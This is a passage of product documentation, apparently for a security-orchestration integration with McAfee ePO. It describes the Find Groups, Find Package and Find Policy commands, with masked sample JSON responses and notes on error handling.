Organization\\\\\\\\AWS\\\\\\\\jhou\\\\\\\\US East (Ohio)\\\\\\\\us-east-2a\\\",\\r\\n\\t\\t\\t\\\"My Organization\\\\\\\\AWS\\\\\\\\jhou\\\\\\\\US East (Ohio)\\\\\\\\us-east-2b\\\",\\r\\n\\t\\t\\t\\\"My Organization\\\\\\\\AWS\\\\\\\\jhou\\\\\\\\US West (N. California)\\\",\\r\\n\\t\\t\\t\\\"My Organization\\\\\\\\AWS\\\\\\\\jhou\\\\\\\\US West (Oregon)\\\",\\r\\n\\t\\t\\t\\\"My Organization\\\\\\\\My Group 4\\\"\\r\\n\\t\\t]\""
}
Return Data

Indicates one of the possible command execution states: Successful or Failed.

The Failed state can be triggered by any of the following errors:

  • A connection issue with the integration

  • The API returned an error message

  • No response from the API

You can view more details about an error in the Error tab.

Return Data can be passed down directly to a subsequent command or used to create conditional tasks in playbooks.

SAMPLE DATA

CODE
Successful
Result

Provides a brief summary of outputs in an HTML formatted table.

SAMPLE DATA

groupId

groupPath

2

My Organization

3

My Organization\Lost and Found

4

My Organization\Laptops

5

My Organization\Workstations

6

My Organization\Servers

7

My Organization\Servers\AD Domain Controllers

8

My Organization\Servers\DHCP and WINS Servers

9

My Organization\Servers\Mail Servers

10

My Organization\Servers\Sharepoint Servers

11

My Organization\Servers\SQL Servers

13

My Organization\Lost and Found\QA

14

My Organization\Lost and Found\WORKGROUP

15

My Organization\My Group

Error Handling

If the Return Data is Failed, an Error tab will appear in the Test Result window.

The error tab contains the details responded from D3 SOAR or third-party API calls, including Failure Indicator, Status Code, and Message. This can help you locate the root cause of a command failure.

Parts in Error

Description

Example

Failure Indicator

Indicates the command failure that happened at a specific input and/or API call.

Find Groups failed.

Status Code

The response code issued by the third-party API server or the D3 SOAR system that can be used to locate the corresponding error category. For example, if the returned status code is 401, the selected connection is unauthorized to run the command. The user or system support would need to check the permission setting in the Trellix McAfee ePO portal. Refer to the HTTP Status Code Registry for details.

Status Code: 401.

Message

The raw data or captured key error message from the integration API server about the API request failure.

Message: Unauthorized.

Error Sample Data

Find Groups failed.

Status Code: 401.

Message: Unauthorized.

Find Package

Retrieves packages based on the provided search text.

Input

Input Parameter

Required/Optional

Description

Example

Search Text

Optional

The search text defining the condition to retrieve packages.

all

Output

Raw Data

The primary response data from the API request.

SAMPLE DATA

JSON
{
  "existsInCurrent": null,
  "distributionType": "Licensed",
  "existsInPrevious": null,
  "hidden": false,
  "productID": "*****",
  "productDetectionPlatformID": "***",
  "checkinDate": "2018-02-14T13****:****:****:***::****-****:****:****:***::****",
  "buildNumber": "623",
  "databaseAutoId": 0,
  "packageType": "Install",
  "productName": "Product Improvement Program",
  "signerName": "McAfee",
  "evaluation": false,
  "hashCode": "1425209253",
  "id": "***************************************",
  "keyType": 0,
  "conflictingPackageItems": [],
  "signingKeyHash": "*****=",
  "deploymentPath": null,
  "unknownDistributionType": false,
  "licensed": true,
  "existsInEvaluation": null,
  "packageId": "*****_Current_Install_0000_1.6.0_***3",
  "dependencyProductID": null,
  "packageTotalSize": "2763",
  "applicableForGlobalUpdating": false,
  "packageLangID": "0000",
  "hotFixVersion": "623",
  "productDetectionProductVersion": "1.6.0",
  "revokedStatus": false,
  "managedPkgDependencyList": null,
  "engineVersion64": "",
  "packageBranch": "Current",
  "productPlatform": null
  },
  {
  "existsInCurrent": null,
  "distributionType": "licensed",
  "existsInPrevious": null,
  "hidden": false,
  "productID": "*****",
  "productDetectionPlatformID": "*****",
  "checkinDate": "2018-02-14T13:14:35-08:00",
  "buildNumber": "619",
  "databaseAutoId": 0,
  "packageType": "Install",
  "productName": "Endpoint Security Threat Prevention",
  "signerName": "McAfee",
  "evaluation": false,
  "hashCode": "325877289",
  "id": "***************************************",
  "keyType": 0,
  "conflictingPackageItems": [],
  "signingKeyHash": "w+*****=",
  "deploymentPath": null,
  "unknownDistributionType": false,
  "licensed": true,
  "existsInEvaluation": null,
  "packageId": "ENDP_AM_1020_Current_Install_0000_10.2.0_*****",
  "dependencyProductID": "******",
  "packageTotalSize": "43331",
  "applicableForGlobalUpdating": false,
  "packageLangID": "0000",
  "hotFixVersion": "619",
  "productDetectionProductVersion": "10.2.0",
  "revokedStatus": false,
  "managedPkgDependencyList": null,
  "engineVersion64": "",
  "packageBranch": "Current",
  "productPlatform": null
  },
  {
  "existsInCurrent": null,
  "distributionType": "licensed",
  "existsInPrevious": null,
  "hidden": false,
  "productID": "*****",
  "productDetectionPlatformID": "*****",
  "checkinDate": "2018-02-14T13:14:53-08:00",
  "buildNumber": "361",
  "databaseAutoId": 0,
  "packageType": "Install",
  "productName": "Endpoint Security Firewall",
  "signerName": "McAfee",
  "evaluation": false,
  "hashCode": "-1329182882",
  "id": "***************************************",
  "keyType": 0,
  "conflictingPackageItems": [],
  "signingKeyHash": "w+*****=",
  "deploymentPath": null,
  "unknownDistributionType": false,
  "licensed": true,
  "existsInEvaluation": null,
  "packageId": "******Current_Install_0000_10.2.0_*****",
  "dependencyProductID": "*****",
  "packageTotalSize": "16164",
  "applicableForGlobalUpdating": false,
  "packageLangID": "0000",
  "hotFixVersion": "361",
  "productDetectionProductVersion": "10.2.0",
  "revokedStatus": false,
  "managedPkgDependencyList": null,
  "engineVersion64": "",
  "packageBranch": "Current",
  "productPlatform": null
  }
]
Context Data

The data extracted from Raw Data converted into JSON format. Context Data may be identical to Raw Data in some cases.

It is recommended to refer to the Raw Data instead of Context Data, since it contains the complete API response data. D3 will deprecate Context Data in the future, and playbook tasks using Context Data will be replaced with Raw Data.

SAMPLE DATA

CODE
{
  "existsInCurrent": null,
  "distributionType": "Licensed",
  "existsInPrevious": null,
  "hidden": false,
  "productID": "*****",
  "productDetectionPlatformID": "***",
  "checkinDate": "2018-02-14T13****:****:****:***::****-****:****:****:***::****",
  "buildNumber": "623",
  "databaseAutoId": 0,
  "packageType": "Install",
  "productName": "Product Improvement Program",
  "signerName": "McAfee",
  "evaluation": false,
  "hashCode": "1425209253",
  "id": "***************************************",
  "keyType": 0,
  "conflictingPackageItems": [],
  "signingKeyHash": "*****=",
  "deploymentPath": null,
  "unknownDistributionType": false,
  "licensed": true,
  "existsInEvaluation": null,
  "packageId": "*****_Current_Install_0000_1.6.0_***3",
  "dependencyProductID": null,
  "packageTotalSize": "2763",
  "applicableForGlobalUpdating": false,
  "packageLangID": "0000",
  "hotFixVersion": "623",
  "productDetectionProductVersion": "1.6.0",
  "revokedStatus": false,
  "managedPkgDependencyList": null,
  "engineVersion64": "",
  "packageBranch": "Current",
  "productPlatform": null
  },
  {
  "existsInCurrent": null,
  "distributionType": "licensed",
  "existsInPrevious": null,
  "hidden": false,
  "productID": "*****",
  "productDetectionPlatformID": "*****",
  "checkinDate": "2018-02-14T13:14:35-08:00",
  "buildNumber": "619",
  "databaseAutoId": 0,
  "packageType": "Install",
  "productName": "Endpoint Security Threat Prevention",
  "signerName": "McAfee",
  "evaluation": false,
  "hashCode": "325877289",
  "id": "***************************************",
  "keyType": 0,
  "conflictingPackageItems": [],
  "signingKeyHash": "w+*****=",
  "deploymentPath": null,
  "unknownDistributionType": false,
  "licensed": true,
  "existsInEvaluation": null,
  "packageId": "ENDP_AM_1020_Current_Install_0000_10.2.0_*****",
  "dependencyProductID": "******",
  "packageTotalSize": "43331",
  "applicableForGlobalUpdating": false,
  "packageLangID": "0000",
  "hotFixVersion": "619",
  "productDetectionProductVersion": "10.2.0",
  "revokedStatus": false,
  "managedPkgDependencyList": null,
  "engineVersion64": "",
  "packageBranch": "Current",
  "productPlatform": null
  },
  {
  "existsInCurrent": null,
  "distributionType": "licensed",
  "existsInPrevious": null,
  "hidden": false,
  "productID": "*****",
  "productDetectionPlatformID": "*****",
  "checkinDate": "2018-02-14T13:14:53-08:00",
  "buildNumber": "361",
  "databaseAutoId": 0,
  "packageType": "Install",
  "productName": "Endpoint Security Firewall",
  "signerName": "McAfee",
  "evaluation": false,
  "hashCode": "-1329182882",
  "id": "***************************************",
  "keyType": 0,
  "conflictingPackageItems": [],
  "signingKeyHash": "w+*****=",
  "deploymentPath": null,
  "unknownDistributionType": false,
  "licensed": true,
  "existsInEvaluation": null,
  "packageId": "******Current_Install_0000_10.2.0_*****",
  "dependencyProductID": "*****",
  "packageTotalSize": "16164",
  "applicableForGlobalUpdating": false,
  "packageLangID": "0000",
  "hotFixVersion": "361",
  "productDetectionProductVersion": "10.2.0",
  "revokedStatus": false,
  "managedPkgDependencyList": null,
  "engineVersion64": "",
  "packageBranch": "Current",
  "productPlatform": null
  }
]
Key Fields

Common cyber security indicators such as unique IDs, file hash values, CVE numbers, IP addresses, etc., will be extracted from Raw Data as Key Fields.
The system stores these key fields in the path $.[playbookTask].outputData. You can use these key-value pairs as data points for playbook task inputs.

SAMPLE DATA

CODE
{
  "checkinDate": "\"[\\r\\n\\t\\t\\t\\\"2018-02-14T13****:****:****:***::****-****:****:****:***::****\\\",\\r\\n\\t\\t\\t\\\"2018-02-14T13****:****:****:***::****-****:****:****:***::****\\\",\\r\\n\\t\\t\\t\\\"2018-02-14T13****:****:****:***::****-****:****:****:***::****\\\",\\r\\n\\t\\t\\t\\\"2018-02-14T13****:****:****:***::****-****:****:****:***::****\\\",\\r\\n\\t\\t\\t\\\"2018-02-14T13****:****:****:***::****-****:****:****:***::****\\\",\\r\\n\\t\\t\\t\\\"2018-02-14T13****:****:****:***::****-****:****:****:***::****\\\",\\r\\n\\t\\t\\t\\\"2018-02-14T13****:****:****:***::****-****:****:****:***::****\\\",\\r\\n\\t\\t\\t\\\"2018-02-14T13****:****:****:***::****-****:****:****:***::****\\\",\\r\\n\\t\\t\\t\\\"2018-02-14T13****:****:****:***::****-****:****:****:***::****\\\",\\r\\n\\t\\t\\t\\\"2019-12-24T23****:****:****:***::****-****:****:****:***::****\\\",\\r\\n\\t\\t\\t\\\"2020-02-13T17****:****:****:***::****-****:****:****:***::****\\\",\\r\\n\\t\\t\\t\\\"2018-02-14T13****:****:****:***::****-****:****:****:***::****\\\",\\r\\n\\t\\t\\t\\\"2019-05-23T11****:****:****:***::****-****:****:****:***::****\\\",\\r\\n\\t\\t\\t\\\"2019-05-23T11****:****:****:***::****-****:****:****:***::****\\\",\\r\\n\\t\\t\\t\\\"2019-05-31T16****:****:****:***::****-****:****:****:***::****\\\",\\r\\n\\t\\t\\t\\\"2019-05-31T16****:****:****:***::****-****:****:****:***::****\\\",\\r\\n\\t\\t\\t\\\"2019-05-31T16****:****:****:***::****-****:****:****:***::****\\\",\\r\\n\\t\\t\\t\\\"2019-05-31T16****:****:****:***::****-****:****:****:***::****\\\",\\r\\n\\t\\t\\t\\\"2019-05-31T16****:****:****:***::****-****:****:****:***::****\\\",\\r\\n\\t\\t\\t\\\"2019-05-31T17****:****:****:***::****-****:****:****:***::****\\\",\\r\\n\\t\\t\\t\\\"2019-05-31T17****:****:****:***::****-****:****:****:***::****\\\",\\r\\n\\t\\t\\t\\\"2019-06-04T09****:****:****:***::****-****:****:****:***::****\\\",\\r\\n\\t\\t\\t\\\"2019-06-04T09****:****:****:***::****-****:****:****:***::****\\\",\\r\\n\\t\\t\\t\\\"2019-06-04T09****:****:****:***::****-****:****:****:***::****\\\",\\r\\n\\t\\t\\t\\\"2019-06-04T12****:****:****:***::****-****:****:****:***::****\\\",\\r\\n\\t\\t\\t\\\"2019-10-27T16****:****:****:***::****-****:****:****:***::****\\\",\\r\\n\\t\\t\\t\\\"2019-12-24T23****:****:****:***::****-****:****:****:***::****\\\",\\r\\n\\t\\t\\t\\\"2019-10-27T16****:****:****:***::****-****:****:****:***::****\\\",\\r\\n\\t\\t\\t\\\"2019-12-24T23****:****:****:***::****-****:****:****:***::****\\\",\\r\\n\\t\\t\\t\\\"2019-06-06T15****:****:****:***::****-****:****:****:***::****\\\",\\r\\n\\t\\t\\t\\\"2019-06-10T13****:****:****:***::****-****:****:****:***::****\\\",\\r\\n\\t\\t\\t\\\"2019-12-25T00****:****:****:***::****-****:****:****:***::****\\\",\\r\\n\\t\\t\\t\\\"2019-12-25T00****:****:****:***::****-****:****:****:***::****\\\",\\r\\n\\t\\t\\t\\\"2019-12-25T00****:****:****:***::****-****:****:****:***::****\\\",\\r\\n\\t\\t\\t\\\"2019-12-25T00****:****:****:***::****-****:****:****:***::****\\\",\\r\\n\\t\\t\\t\\\"2019-06-10T14****:****:****:***::****-****:****:****:***::****\\\",\\r\\n\\t\\t\\t\\\"2019-10-22T20****:****:****:***::****-****:****:****:***::****\\\",\\r\\n\\t\\t\\t\\\"2019-10-22T20****:****:****:***::****-****:****:****:***::****\\\",\\r\\n\\t\\t\\t\\\"2019-10-22T21****:****:****:***::****-****:****:****:***::****\\\",\\r\\n\\t\\t\\t\\\"2019-10-27T16****:****:****:***::****-****:****:****:***::****\\\",\\r\\n\\t\\t\\t\\\"2019-11-21T14****:****:****:***::****-****:****:****:***::****\\\",\\r\\n\\t\\t\\t\\\"2019-11-21T18****:****:****:***::****-****:****:****:***::****\\\",\\r\\n\\t\\t\\t\\\"2019-12-03T15****:****:****:***::****-****:****:****:***::****\\\",\\r\\n\\t\\t\\t\\\"2019-12-03T15****:****:****:***::****-****:****:****:***::****\\\",\\r\\n\\t\\t\\t\\\"2019-12-24T23****:****:****:***::****-****:****:****:***::****\\\"\\r\\n\\t\\t]\"",
  "distributionType": "\"[\\r\\n\\t\\t\\t\\\"Licensed\\\",\\r\\n\\t\\t\\t\\\"licensed\\\",\\r\\n\\t\\t\\t\\\"licensed\\\",\\r\\n\\t\\t\\t\\\"licensed\\\",\\r\\n\\t\\t\\t\\\"licensed\\\",\\r\\n\\t\\t\\tnull,\\r\\n\\t\\t\\tnull,\\r\\n\\t\\t\\tnull,\\r\\n\\t\\t\\tnull,\\r\\n\\t\\t\\t\\\"licensed\\\",\\r\\n\\t\\t\\t\\\"licensed\\\",\\r\\n\\t\\t\\t\\\"licensed\\\",\\r\\n\\t\\t\\t\\\"licensed\\\",\\r\\n\\t\\t\\t\\\"licensed\\\",\\r\\n\\t\\t\\t\\\"licensed\\\",\\r\\n\\t\\t\\t\\\"licensed\\\",\\r\\n\\t\\t\\t\\\"licensed\\\",\\r\\n\\t\\t\\t\\\"licensed\\\",\\r\\n\\t\\t\\t\\\"licensed\\\",\\r\\n\\t\\t\\t\\\"licensed\\\",\\r\\n\\t\\t\\t\\\"licensed\\\",\\r\\n\\t\\t\\t\\\"licensed\\\",\\r\\n\\t\\t\\t\\\"licensed\\\",\\r\\n\\t\\t\\t\\\"licensed\\\",\\r\\n\\t\\t\\t\\\"licensed\\\",\\r\\n\\t\\t\\t\\\"licensed\\\",\\r\\n\\t\\t\\t\\\"licensed\\\",\\r\\n\\t\\t\\t\\\"licensed\\\",\\r\\n\\t\\t\\t\\\"licensed\\\",\\r\\n\\t\\t\\t\\\"licensed\\\",\\r\\n\\t\\t\\tnull,\\r\\n\\t\\t\\tnull,\\r\\n\\t\\t\\tnull,\\r\\n\\t\\t\\t\\\"licensed\\\",\\r\\n\\t\\t\\t\\\"licensed\\\",\\r\\n\\t\\t\\tnull,\\r\\n\\t\\t\\t\\\"licensed\\\",\\r\\n\\t\\t\\t\\\"licensed\\\",\\r\\n\\t\\t\\t\\\"licensed\\\",\\r\\n\\t\\t\\t\\\"licensed\\\",\\r\\n\\t\\t\\t\\\"licensed\\\",\\r\\n\\t\\t\\t\\\"licensed\\\",\\r\\n\\t\\t\\tnull,\\r\\n\\t\\t\\t\\\"Licensed\\\",\\r\\n\\t\\t\\t\\\"licensed\\\"\\r\\n\\t\\t]\"",
  "id": "***************************************"[\\r\\n\\t\\t\\t\\\"*****_Current_Install_0000_1.6.0_*****\\\"\\r\\n\\t\\t]\"",
  "packageBranch": "\"[\\r\\n\\t\\t\\t\\\"Current\\\",\\r\\n\\t\\t\\t\\\"Current\\\",\\r\\n\\t\\t\\t\\\"Current\\\",\\r\\n\\t\\t\\t\\\"Current\\\",\\r\\n\\t\\t\\t\\\"Current\\\",\\r\\n\\t\\t\\t\\\"Current\\\",\\r\\n\\t\\t\\t\\\"Current\\\",\\r\\n\\t\\t\\t\\\"Current\\\",\\r\\n\\t\\t\\t\\\"Current\\\",\\r\\n\\t\\t\\t\\\"Current\\\",\\r\\n\\t\\t\\t\\\"Previous\\\",\\r\\n\\t\\t\\t\\\"Current\\\",\\r\\n\\t\\t\\t\\\"Current\\\",\\r\\n\\t\\t\\t\\\"Current\\\",\\r\\n\\t\\t\\t\\\"Current\\\",\\r\\n\\t\\t\\t\\\"Current\\\",\\r\\n\\t\\t\\t\\\"Current\\\",\\r\\n\\t\\t\\t\\\"Current\\\",\\r\\n\\t\\t\\t\\\"Current\\\",\\r\\n\\t\\t\\t\\\"Current\\\",\\r\\n\\t\\t\\t\\\"Current\\\",\\r\\n\\t\\t\\t\\\"Current\\\",\\r\\n\\t\\t\\t\\\"Current\\\",\\r\\n\\t\\t\\t\\\"Current\\\",\\r\\n\\t\\t\\t\\\"Current\\\",\\r\\n\\t\\t\\t\\\"Current\\\",\\r\\n\\t\\t\\t\\\"Previous\\\",\\r\\n\\t\\t\\t\\\"Current\\\",\\r\\n\\t\\t\\t\\\"Previous\\\",\\r\\n\\t\\t\\t\\\"Current\\\",\\r\\n\\t\\t\\t\\\"Current\\\",\\r\\n\\t\\t\\t\\\"Previous\\\",\\r\\n\\t\\t\\t\\\"Current\\\",\\r\\n\\t\\t\\t\\\"Previous\\\",\\r\\n\\t\\t\\t\\\"Current\\\",\\r\\n\\t\\t\\t\\\"Current\\\",\\r\\n\\t\\t\\t\\\"Current\\\",\\r\\n\\t\\t\\t\\\"Current\\\",\\r\\n\\t\\t\\t\\\"Current\\\",\\r\\n\\t\\t\\t\\\"Current\\\",\\r\\n\\t\\t\\t\\\"Current\\\",\\r\\n\\t\\t\\t\\\"Current\\\",\\r\\n\\t\\t\\t\\\"Current\\\",\\r\\n\\t\\t\\t\\\"Current\\\",\\r\\n\\t\\t\\t\\\"Current\\\"\\r\\n\\t\\t]\"",
  "packageId": "\"[\\r\\n\\t\\t\\t\\\"*****_0000_1.6.0_*****\\\"\\r\\n\\t\\t]\"",
  "packageType": "\"[\\r\\n\\t\\t\\t\\\"Install\\\"]\"",
  "productDetectionPlatformID": "\"[\\r\\n\\t\\t\\t\\\"*****\\\"]\"",
  "productID": "\"[\\r\\n\\t\\t\\t\\\"*****\\\",\\r\\n\\t\\t\\t\\\"*****\\\",\\r\\n\\t\\t\\t\\\"*****\\\",\\r\\n\\t\\t\\t\\\"*****\\\"]\"",
  "productName": "\"[\\r\\n\\t\\t\\t\\\"Product Improvement Program\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security Threat Prevention\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security Firewall\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security Web Control\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security Platform\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security Threat Prevention for Mac\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security Firewall for Mac\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security Web Control for Mac\\\",\\r\\n\\t\\t\\t\\\"McAfee Data Loss Prevention - Device Control\\\",\\r\\n\\t\\t\\t\\\"McAfee Agent for Windows\\\",\\r\\n\\t\\t\\t\\\"McAfee Agent for Windows\\\",\\r\\n\\t\\t\\t\\\"McAfee Endpoint Security for Linux Threat Prevention\\\",\\r\\n\\t\\t\\t\\\"McAfee Client Proxy\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security Threat Prevention\\\",\\r\\n\\t\\t\\t\\\"MVISION EDR Agent\\\",\\r\\n\\t\\t\\t\\\"MVISION EDR Endpoint Snapshot Tool (x64)\\\",\\r\\n\\t\\t\\t\\\"MVISION EDR Endpoint Snapshot Tool (x86)\\\",\\r\\n\\t\\t\\t\\\"DXL Platform\\\",\\r\\n\\t\\t\\t\\\"Data Exchange Layer Broker\\\",\\r\\n\\t\\t\\t\\\"McAfee Agent for LINUX\\\",\\r\\n\\t\\t\\t\\\"McAfee Agent for MAC\\\",\\r\\n\\t\\t\\t\\\"Threat Intelligence Exchange module for VirusScan Enterprise\\\",\\r\\n\\t\\t\\t\\\"TIE Server\\\",\\r\\n\\t\\t\\t\\\"TIE Platform\\\",\\r\\n\\t\\t\\t\\\"McAfee Data Loss Prevention\\\",\\r\\n\\t\\t\\t\\\"McAfee Active Response Aggregator\\\",\\r\\n\\t\\t\\t\\\"McAfee Active Response Aggregator\\\",\\r\\n\\t\\t\\t\\\"McAfee Active Response Server\\\",\\r\\n\\t\\t\\t\\\"McAfee Active Response Server\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security Threat Intelligence\\\",\\r\\n\\t\\t\\t\\\"McAfee DLP Discover Server\\\",\\r\\n\\t\\t\\t\\\"McAfee DLP Server\\\",\\r\\n\\t\\t\\t\\\"McAfee DLP Server\\\",\\r\\n\\t\\t\\t\\\"McAfee Data Loss Prevention\\\",\\r\\n\\t\\t\\t\\\"McAfee Data Loss Prevention\\\",\\r\\n\\t\\t\\t\\\"McAfee DLP OCR Add-on\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security Firewall\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security Web Control\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security Platform\\\",\\r\\n\\t\\t\\t\\\"Solidcore Client for Windows\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security Adaptive Threat Protection\\\",\\r\\n\\t\\t\\t\\\"SIEM Collector\\\",\\r\\n\\t\\t\\t\\\"McAfee DVM Engine for Windows\\\",\\r\\n\\t\\t\\t\\\"McAfee DAM Sensor for Windows\\\",\\r\\n\\t\\t\\t\\\"McAfee Active Response\\\"\\r\\n\\t\\t]\"",
  "signerName": "\"[\\r\\n\\t\\t\\t\\\"McAfee\\\",\\r\\n\\t\\t\\t\\\"McAfee\\\",\\r\\n\\t\\t\\t\\\"McAfee\\\",\\r\\n\\t\\t\\t\\\"McAfee\\\",\\r\\n\\t\\t\\t\\\"McAfee\\\",\\r\\n\\t\\t\\t\\\"McAfee\\\",\\r\\n\\t\\t\\t\\\"McAfee\\\",\\r\\n\\t\\t\\t\\\"McAfee\\\",\\r\\n\\t\\t\\t\\\"McAfee\\\",\\r\\n\\t\\t\\t\\\"McAfee\\\",\\r\\n\\t\\t\\t\\\"McAfee\\\",\\r\\n\\t\\t\\t\\\"McAfee\\\",\\r\\n\\t\\t\\t\\\"McAfee\\\",\\r\\n\\t\\t\\t\\\"McAfee\\\",\\r\\n\\t\\t\\t\\\"McAfee\\\",\\r\\n\\t\\t\\t\\\"McAfee\\\",\\r\\n\\t\\t\\t\\\"McAfee\\\",\\r\\n\\t\\t\\t\\\"McAfee\\\",\\r\\n\\t\\t\\t\\\"McAfee\\\",\\r\\n\\t\\t\\t\\\"McAfee\\\",\\r\\n\\t\\t\\t\\\"McAfee\\\",\\r\\n\\t\\t\\t\\\"McAfee\\\",\\r\\n\\t\\t\\t\\\"McAfee\\\",\\r\\n\\t\\t\\t\\\"McAfee\\\",\\r\\n\\t\\t\\t\\\"McAfee\\\",\\r\\n\\t\\t\\t\\\"McAfee\\\",\\r\\n\\t\\t\\t\\\"McAfee\\\",\\r\\n\\t\\t\\t\\\"McAfee\\\",\\r\\n\\t\\t\\t\\\"McAfee\\\",\\r\\n\\t\\t\\t\\\"McAfee\\\",\\r\\n\\t\\t\\t\\\"McAfee\\\",\\r\\n\\t\\t\\t\\\"McAfee\\\",\\r\\n\\t\\t\\t\\\"McAfee\\\",\\r\\n\\t\\t\\t\\\"McAfee\\\",\\r\\n\\t\\t\\t\\\"McAfee\\\",\\r\\n\\t\\t\\t\\\"McAfee\\\",\\r\\n\\t\\t\\t\\\"McAfee\\\",\\r\\n\\t\\t\\t\\\"McAfee\\\",\\r\\n\\t\\t\\t\\\"McAfee\\\",\\r\\n\\t\\t\\t\\\"McAfee\\\",\\r\\n\\t\\t\\t\\\"McAfee\\\",\\r\\n\\t\\t\\t\\\"McAfee\\\",\\r\\n\\t\\t\\t\\\"McAfee\\\",\\r\\n\\t\\t\\t\\\"McAfee\\\",\\r\\n\\t\\t\\t\\\"McAfee\\\"\\r\\n\\t\\t]\"",
  "signingKeyHash": "\"[\\r\\n\\t\\t\\t\\\"*****=\\\",\\r\\n\\t\\t\\t\\\"w+*****=\\\",\\r\\n\\t\\t\\t\\\"w+*****=\\\"]\""
}
Return Data

Indicates one of the possible command execution states: Successful or Failed.

The Failed state can be triggered by any of the following errors:

  • A connection issue with the integration

  • The API returned an error message

  • No response from the API

You can view more details about an error in the Error tab.

Return Data can be passed down directly to a subsequent command or used to create conditional tasks in playbooks.

SAMPLE DATA

CODE
Successful
Result

Provides a brief summary of outputs in an HTML formatted table.

SAMPLE DATA

EXISTSINCURRENT

DISTRIBUTIONTYPE

EXISTSINPREVIOUS

HIDDEN

PRODUCTID

PRODUCTDETECTIONPLATFORMID

CHECKINDATE

BUILDNUMBER

DATABASEAUTOID

PACKAGETYPE

PRODUCTNAME

SIGNERNAME

EVALUATION

HASHCODE

ID

KEYTYPE

CONFLICTINGPACKAGEITEMS

SIGNINGKEYHASH

DEPLOYMENTPATH

UNKNOWNDISTRIBUTIONTYPE

LICENSED

EXISTSINEVALUATION

PACKAGEID

DEPENDENCYPRODUCTID

PACKAGETOTALSIZE

APPLICABLEFORGLOBALUPDATING

PACKAGELANGID

HOTFIXVERSION

PRODUCTDETECTIONPRODUCTVERSION

REVOKEDSTATUS

MANAGEDPKGDEPENDENCYLIST

ENGINEVERSION64

PACKAGEBRANCH

PRODUCTPLATFORM

Licensed

False

T*****

W*****

2/14/2018 1:10:22 PM

6***

0

Install

Product Improvement Program

McAfee

False

1*****

TELEMTRY1000_Current_Install_0000_1.6.0_*****

0

[]

H*****=

False

True

T*****_Current_Install_0000_1.6.0_*****

2763

False

0000

623

1.6.0

False

Current

Error Handling

If the Return Data is Failed, an Error tab will appear in the Test Result window.

The error tab contains the details responded from D3 SOAR or third-party API calls, including Failure Indicator, Status Code, and Message. This can help you locate the root cause of a command failure.

Parts in Error

Description

Example

Failure Indicator

Indicates the command failure that happened at a specific input and/or API call.

Find Package failed.

Status Code

The response code issued by the third-party API server or the D3 SOAR system that can be used to locate the corresponding error category. For example, if the returned status code is 401, the selected connection is unauthorized to run the command. The user or system support would need to check the permission setting in the Trellix McAfee ePO portal. Refer to the HTTP Status Code Registry for details.

Status Code: 401.

Message

The raw data or captured key error message from the integration API server about the API request failure.

Message: Unauthorized.

Error Sample Data

Find Package failed.

Status Code: 401.

Message: Unauthorized.

Find Policy

Retrieves ePO policies based on the provided search text.

Input

Input Parameter

Required/Optional

Description

Example

Search Text

Optional

The search text defining the condition to retrieve policies.

My Default

Output

Raw Data

The primary response data from the API request.

SAMPLE DATA

JSON
[
    {
        "productId": "MARCOBA_META",
        "featureName": "MARCOBA_META",
        "typeName": "General",
        "objectName": "My Default",
        "typeId": *****,
        "featureId": "MARCOBA_META",
        "objectId": *****,
        "productName": "Active Response 2.4.0",
        "objectNotes": ""
    }
]
Context Data

The data extracted from Raw Data converted into JSON format. Context Data may be identical to Raw Data in some cases.

It is recommended to refer to the Raw Data instead of Context Data, since it contains the complete API response data. D3 will deprecate Context Data in the future, and playbook tasks using Context Data will be replaced with Raw Data.

SAMPLE DATA

CODE
[
    {
        "productId": "MARCOBA_META",
        "featureName": "MARCOBA_META",
        "typeName": "General",
        "objectName": "My Default",
        "typeId": *****,
        "featureId": "MARCOBA_META",
        "objectId": *****,
        "productName": "Active Response 2.4.0",
        "objectNotes": ""
    }
]
Key Fields

Common cyber security indicators such as unique IDs, file hash values, CVE numbers, IP addresses, etc., will be extracted from Raw Data as Key Fields.
The system stores these key fields in the path $.[playbookTask].outputData. You can use these key-value pairs as data points for playbook task inputs.

SAMPLE DATA

CODE
{
    "Output": "\"[{\\\"groupId\\\":2,\\\"groupPath\\\":\\\"My Organization\\\"},{\\\"groupId\\\":3,\\\"groupPath\\\":\\\"My Organization\\\\\\\\Lost and Found\\\"},{\\\"groupId\\\":4,\\\"groupPath\\\":\\\"My Organization\\\\\\\\Lost and Found\\\\\\\\WORKGROUP\\\"},{\\\"groupId\\\":5,\\\"groupPath\\\":\\\"My Organization\\\\\\\\d3cyber7.local\\\"},{\\\"groupId\\\":6,\\\"groupPath\\\":\\\"My Organization\\\\\\\\Lost and Found\\\\\\\\d3cyber7.local\\\"}]\\r\\n\"",
    "featureId": "\"[\\r\\n \\r\\n  \\\"MARCOBA_META\\\",\\r\\n \\r\\n  \\\"MARCOBA_META\\\",\\r\\n \\r\\n  \\\"assessment\\\",\\r\\n \\r\\n  \\\"assessment\\\",\\r\\n \\r\\n  \\\"assessment\\\",\\r\\n \\r\\n  \\\"assessment\\\",\\r\\n \\r\\n  \\\"MCA_____1000\\\",\\r\\n \\r\\n  \\\"UDLPSRVR2013\\\",\\r\\n \\r\\n  \\\"UDLPSRVR2013\\\",\\r\\n \\r\\n  \\\"DLPPS___1000\\\",\\r\\n \\r\\n  \\\"DLPPS___1000\\\",\\r\\n \\r\\n  \\\"DLPPS___1000\\\",\\r\\n \\r\\n  \\\"DLPPS___1000\\\",\\r\\n \\r\\n  \\\"DLPPS___1000\\\",\\r\\n \\r\\n  \\\"DLPPS___1000\\\",\\r\\n \\r\\n  \\\"TIEClientMETA\\\",\\r\\n \\r\\n  \\\"TIEClientMETA\\\",\\r\\n \\r\\n  \\\"TIEClientMETA\\\",\\r\\n \\r\\n  \\\"ENDP_GS_1000\\\",\\r\\n \\r\\n  \\\"ENDP_FW_META_FW\\\",\\r\\n \\r\\n  \\\"ENDP_FW_META_FW\\\",\\r\\n \\r\\n  \\\"ENDP_FW_META_FW\\\",\\r\\n \\r\\n  